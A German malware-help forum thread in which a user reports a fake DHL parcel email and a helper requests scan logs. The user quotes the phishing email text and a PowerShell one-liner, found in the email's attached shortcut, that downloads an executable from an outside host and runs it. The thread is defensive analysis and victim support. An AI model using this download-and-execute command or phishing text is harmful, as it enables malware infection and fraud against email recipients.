Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Gefälschte DHL-Email und (schädliche?) Infektion (https://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html)

typsad 14.10.2015 23:20
Gefälschte DHL-Email und (schädliche?) Infektion
 
Hallo,

Ich melde mich hier vorsorglich.
Heute hat mein Vater eine Paketbestätigung erhalten, dass ein Paket abholbereit sein soll. Unachtsam wie mein Vater ist, hat er die Mail versucht zu öffnen. Da ihm das nicht gelungen ist, hat er sie an mich weitergeleitet.

Die Mail sieht wie folgt aus:

Betreff: "New paket!"

Text:
(DHL BANNER)
Code:
       

Guten Tag xxxx@xxxx.de,

Ihr Paket ID##### ist empfangsbereit.

Diese e-mail ist eine Mitteilung für die Ankunft.
Lieferung durch den Absender gezahlt.
Die Hohe der Versicherungspaket € ####.

Um das Sendung zu bekommen , bitte drucken Sie das angehangte Dokument und prasentieren sie in einem Lagerhaus.

 

Paket.de – Ihr Weg zum individuellen Paketempfang und -versand
DHL Paket GmbH
Sträßchensweg 10
53113 Bonn

Registergericht Bonn
HRB 19565
USt-IdNr.: DE 813312787

        Geschäftsführung:
Dr. Andrej Busch
Katja Herbst
Norman Chmiel
Heinrich Eilers
Dr. Thomas Ogilvie
Vorsitzender des Aufsichtsrates: Uwe Brinks        Website
Kontakt
Impressum
Datenschutz


© 2015 DHL
(BANNER)

Die Datei habe Ich mal heruntergeladen und in einer VM geöffnet. Es ist eine zip-Datei, in der eine Verknüpfung zu einem .doc ist.
Die Verknüpfung ist manipuliert. Sie öffnet folgenden Befehl:

Code:
(new-object System.Net.WebClient).DownloadFile('hxxp://supportsoft777.pw/bot.exe','%TEMP%\t.exe');Start-Process "%TEMP%\t.exe
Achtung: Die "xx" habe Ich eingesetzt, damit es nicht zu unabsichtlichen Öffnungen kommt.
Leider brachte mir das Nachforschen nichts, außer einem virustotal report (https://www.virustotal.com/de/user/mastertaco/).
Virustotal von der Datei, die da nachgeladen werden soll:
https://www.virustotal.com/de/file/43c91995ee9cb6319a66a21f2e6ff8b28d48bca5872ad2df97d84a653ad5e9a0/analysis/1444860978/

Ist jemandem etwas bekannt zu diesem Vorfall? Die Datei wird ja von kaum einem aktuellen Virenscanner erkannt. An den PC von meinem Vater kann Ich erst morgen ran, um ausführliche Logs zu erstellen.

Gruß

schrauber 15.10.2015 05:58
Die Files ändern sich sekündlich, also kann keiner genau sagen was die machen.

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)


typsad 15.10.2015 12:36
Danke für die Antwort.
Also erstes Symptom scheint zu sein, dass "harmlose" Software nachgeladen wird. Der PC hatte jetzt einige Male "BCWipeTM" und "Acutal Multiple Monitors" versucht zu installieren.
Ich starte den PC mal neu und lege dann die Logs wie gewünscht an.

schrauber 16.10.2015 18:30
ok :)


Alle Zeitangaben in WEZ +1. Es ist jetzt 23:31 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131